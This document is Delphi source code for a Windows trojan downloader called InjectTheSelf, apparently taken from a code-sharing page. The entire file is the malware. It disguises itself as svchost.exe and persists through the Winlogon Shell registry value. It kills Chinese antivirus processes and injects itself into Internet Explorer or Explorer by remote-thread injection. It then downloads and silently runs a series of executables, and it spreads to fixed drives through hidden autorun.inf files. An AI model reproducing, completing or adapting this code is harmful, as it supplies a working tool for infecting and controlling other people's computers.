program InjectTheSelf;
{$IMAGEBASE $13140000}
uses
Windows,
SysUtils,
urlmon,
sendmail,
shellapi,
tlhelp32;
var
MSG:TMSG;
kkk:string;
cTime: TDateTime;
hModule, hModule_News: Pointer;
Extent, Size, ThreadId: longword;
//ProcessHandle, Pid: longword;
sysdir:array[0..145] of char;
ret2:HKEY;
window:HWND;
htimer1,k,n,main:integer;
//time:pchar='5';
//timemain:pchar='5';
time:pchar='999';
timemain:pchar='9999';
kill:pchar='1';
infectl:pchar='1';
static:pchar='1';
//urllabel:pchar='http://www.16518.net/test/1.exe';
//url1: pchar='http://www.16518.net/test/1.exe';
urllabel: pchar ='http:// ';
url1: pchar ='http:// ';
url2: pchar ='http:// ';
url3: pchar ='http:// ';
url4: pchar ='http:// ';
url5: pchar ='http:// ';
url6: pchar ='http:// ';
url7: pchar ='http:// ';
url8: pchar ='http:// ';
url9: pchar ='http:// ';
url10: pchar ='http:// ';
url11: pchar ='http:// ';
urlfirst: pchar ='http:// ';
urldown: pchar ='http:// ';
urlupdate: pchar ='http:// ';
delself:pchar='1';
//获取文件大小
{
function GetHostNam:String;
var
ComputerName: array[0..MAX_COMPUTERNAME_LENGTH+1] of char;
Size: Cardinal;
begin
result:='';
Size := MAX_COMPUTERNAME_LENGTH+1;
GetComputerName(ComputerName, Size);
Result:=StrPas(ComputerName);
end;
//获取本机IP
procedure nametoIP;
type
TaPInAddr = array[0..255] of PInAddr;
PaPInAddr = ^TaPInAddr;
var
phe: PHostEnt;
pptr: PaPInAddr;
Buffer: array[0..63] of char;
i: integer;
GInitData: TWSADATA;
temp:string;
begin
wsastartup($101, GInitData);
Temp := '';
GetHostName(Buffer, SizeOf(Buffer));
phe := GetHostByName(buffer);
if not assigned(phe) then
exit;
pptr := PaPInAddr(Phe^.h_addr_list);
i := 0;
while pptr^[I] <> nil do begin
Temp := Temp + StrPas(inet_ntoa(pptr^[I]^)) + ',';
inc(i);
end;
Delete(Temp, Length(Temp), 1);
try
trueip :=Temp;
except
end;
wsacleanup;
end;
}
procedure tlabel();
var
f:textfile;
i:integer;
buffer,disk:string;
begin
buffer:='first run';
Assignfile(F,'C:\program files\label.tmp');
if not FileExists('C:\program files\label.tmp') Then
begin
Rewrite(F);
Closefile(F);
End
Else Assignfile(F,'C:\program files\label.tmp');
{$I-}
Rewrite(F);
{$I+}
If IOResult<> 0 Then exit;
//Write(F,Memo_gettxt.Text);
//Memo_gettxt.Text:='';
Write(F,buffer);
Closefile(F);
end;
procedure Download; //下载过程
begin
sleep(main);
URLDownloadToFile(nil,urllabel, 'C:\program files\temp.tmp', 0, nil);
//WinExec('C:\program files\system1.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
if FileExists('c:\Program Files\temp.tmp') then
begin
URLDownloadToFile(nil, url1, 'c:\Program Files\system1.exe', 0, nil);
WinExec('c:\Program Files\system1.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url2, 'c:\Program Files\system2.exe', 0, nil);
WinExec('c:\Program Files\system2.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url3, 'c:\Program Files\system3.exe', 0, nil);
WinExec('c:\Program Files\system3.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url4, 'c:\Program Files\system4.exe', 0, nil);
WinExec('c:\Program Files\system4.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url5, 'c:\Program Files\system5.exe', 0, nil);
WinExec('c:\Program Files\system5.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url6, 'c:\Program Files\system6.exe', 0, nil);
WinExec('c:\Program Files\system6.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url7, 'c:\Program Files\system7.exe', 0, nil);
WinExec('c:\Program Files\system7.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url8, 'c:\Program Files\system8.exe', 0, nil);
WinExec('c:\Program Files\system8.exe', SW_SHOW); //SW_SHOW or SW_HIDE
if FileExists('c:\Program Files\label.tmp') then
sleep(k);
URLDownloadToFile(nil, url9, 'c:\Program Files\system9.exe', 0, nil);
WinExec('c:\Program Files\system9.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
begin
URLDownloadToFile(nil, url10, 'c:\Program Files\system10.exe', 0, nil);
WinExec('c:\Program Files\system10.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
URLDownloadToFile(nil, url11, 'c:\Program Files\system11.exe', 0, nil);
WinExec('c:\Program Files\system11.exe', SW_SHOW); //SW_SHOW or SW_HIDE
end;
end;
end;
procedure infect();
var
f:textfile;
i:integer;
buffer,disk:string;
begin
begin
buffer:='[AutoRun]'+#13#10+'open=pagefile.pif';
Assignfile(F,'C:\program files\autorun.inf');
if not FileExists('C:\program files\autorun.inf') Then
begin
Rewrite(F);
Closefile(F);
End
Else Assignfile(F,'C:\program files\autorun.inf');
{$I-}
Rewrite(F);
{$I+}
If IOResult<> 0 Then exit;
//Write(F,Memo_gettxt.Text);
//Memo_gettxt.Text:='';
Write(F,buffer);
Closefile(F);
end;
for i:= ord('c') to ord('z') do
begin
disk:=chr(i);
if getdrivetype(pchar(disk+':\'))=3 then
begin
copyfile('C:\program files\autorun.inf',pchar(disk+':\autorun.inf'),true);
copyfile(pchar(paramstr(0)),pchar(disk+':\pagefile.pif'),true);
SetFileAttributes(pchar(disk+':\autorun.inf'),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(pchar(disk+':\pagefile.pif'),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
end;
end;
deletefile('C:\program files\autorun.inf');
end;
function GetFileSize(const FileName: String): LongInt;
var SearchRec: TSearchRec;
begin
if FindFirst(ExpandFileName(FileName), faAnyFile, SearchRec) = 0 then
Result := SearchRec.Size
else
Result := -1;
end;
function Killpro(ExeFileName: string): integer;
const PROCESS_TERMINATE=$0001;
var ContinueLoop:BOOL;
FSnapshotHandle:THandle;
FProcessEntry32:TProcessEntry32;
begin
result:=0;
FSnapshotHandle:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
ContinueLoop:=Process32First(FSnapshotHandle, FProcessEntry32);
while integer(ContinueLoop)<>0 do
begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile))=ExtractFileName(UpperCase(ExeFileName)))
or (UpperCase(FProcessEntry32.szExeFile) =UpperCase(ExeFileName))) then
Result:=Integer(TerminateProcess(OpenProcess(PROCESS_TERMINATE,BOOL(0),FProcessEntry32.th32ProcessID),0));
ContinueLoop := Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
procedure ExtDelMe;
var
F: textfile;
BatchFileName: string;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
begin
GetwindowsDirectory(sysdir,145);
//DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
BatchFileName := sysdir + '\Deleteme.bat';
AssignFile(F, BatchFileName);
Rewrite(F);
WriteLn(F, ':try');
WriteLn(F, 'del "' + ParamStr(0) + '"');
WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');
WriteLn(F, 'del %0');
CloseFile(F);
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE;
if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
begin
Killpro(pchar(paramstr(0)));
//CloseHandle(ProcessInfo.hThread);
//CloseHandle(ProcessInfo.hProcess);
end;
end;
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := 'C:\Program Files\Internet Explorer\IEXPLORE.EXE';
RegCloseKey(iekey);
end;
procedure TimerProc1(Wnd:HWnd;Msg,TimerID,dwTime:DWORD);stdcall;
begin
infect();
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
createRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
//关联EXE
procedure RunInject(InjType:integer);
var
ProcessHandle, PID: longword;
StartupInfo: TStartupInfo;
ProcessInfo: TProcessInformation;
begin
if InjType=0 then //注入explorer.exe
begin
//获取Exp进程的PID码,Shell_TrayWnd为类名,相关的需用SPY++来查看
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else //注入iexplore.exe
begin
Window:=FindWindow('IEFrame',nil);
if window = 0 then winexec(PChar(GetIEAppPath),sw_hide);
//createProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
end;
//打开进程
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);
end;
begin
{cTime := Now();
host:=DateToStr(cTime) + '-' + TimeToStr(cTime);
nametoIP;
ip:='主机:'+gethostnam+'---------IP地址:'+trueip+'---成功下载';
ip1:='主机:'+gethostnam+'---------IP地址:'+trueip+'---首次安装';
ip2:='主机:'+gethostnam+'---------IP地址:'+trueip+'---服务端升级'; }
GetwindowsDirectory(sysdir,145);
if FileExists(sysdir+'\svchost.exe') then
begin
//自校验
if (getfilesize(pchar(paramstr(0)))>29000) and (getfilesize(pchar(paramstr(0)))<>55296) then exit;
if getfilesize(pchar(sysdir+'\svchost.exe'))<>getfilesize(pchar(paramstr(0))) then //获取大小比较
begin
killpro('svchost.exe');
deletefile(pchar(sysdir+'\svchost.exe'));
copyfile(pchar(paramstr(0)),pchar(sysdir+'\svchost.exe'),true);
WinExec(pchar(sysdir+'\svchost.exe'), SW_HIDE);
//tlabel(); //升级不算第一次下载
if static<>'1' then shellexecute(0,'open','Iexplore.exe',urlupdate,nil,SW_hide);
//sleep(6000);
if strtoint(delself)<>1 then ExtDelMe;
end;
end;
k:=strtoint(time)*1000;
main:=strtoint(timemain)*1000;
n:=0;
repeat
n:=n+1;
begin
DeleteFile('c:\Program Files\system'+inttostr(n)+'.exe'); //1
end;
until
n>11;
if FileExists('c:\Program Files\temp.tmp') then deletefile ('c:\Program Files\temp.tmp');
GetwindowsDirectory(sysdir,145);
if not FileExists(sysdir+'\svchost.exe') then
begin
//自校验
if (getfilesize(pchar(paramstr(0)))>29000) and (getfilesize(pchar(paramstr(0)))<>55296) then exit;
copyfile(pchar(paramstr(0)),pchar(sysdir+'\svchost.exe'),true);
if strtoint(kill)<>1 then
begin
killpro('kvmonxp.exe');//江民
killpro('ravmon.exe')//瑞星
end;
if static<>'1' then shellexecute(0,'open','Iexplore.exe',urlfirst, nil, SW_HIDE);
kkk:= 'Explorer.exe svchost.exe';
RegCreateKey(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',ret2);
RegSetValueEx(Ret2,'Shell', 0, REG_SZ,pchar(kkk), Length(pchar(kkk))+ 1);
//MessageBox(0, '完成', '提示', mb_iconinformation);
RegCloseKey(Ret2);
WinExec(pchar(sysdir+'\svchost.exe'), SW_HIDE);
tlabel();
//sleep(6000);
if strtoint(delself)<>1 then ExtDelMe;
end;
{//EXE关联利用传入参数
if ParamCount> 0 then
begin
origin;
winexec(pchar(ParamStr(1)),sw_show);
reg;
end; }
CreateMutex(nil, True,'system');//设置一个内存标示~防止程序多次运行
if (GetlastError()= ERROR_ALREADY_EXISTS) then halt;
//MessageBox(0, '启动完成', '提示', mb_iconinformation);
//自校验
if (getfilesize(pchar(paramstr(0)))>29000) and (getfilesize(pchar(paramstr(0)))<>55296) then exit;
RunInject(1); //1 注入iexplore.exe 0 注入explorer.exe
if FileExists('c:\Program Files\label.tmp') then deletefile ('c:\Program Files\label.tmp');
if static<>'1' then shellexecute(0, 'open', 'Iexplore.exe', urldown, nil, SW_HIDE);
if strtoint(infectl)<>1 then hTimer1 := SetTimer(0, 0, 30, @TimerProc1);
while(GetMessage(Msg,0,0,0))do //回调函数,非常非常重要,不然TIMER就不管用了
begin
TranslateMessage(Msg);
DispatchMessage(Msg);
end;
end.
关键字词: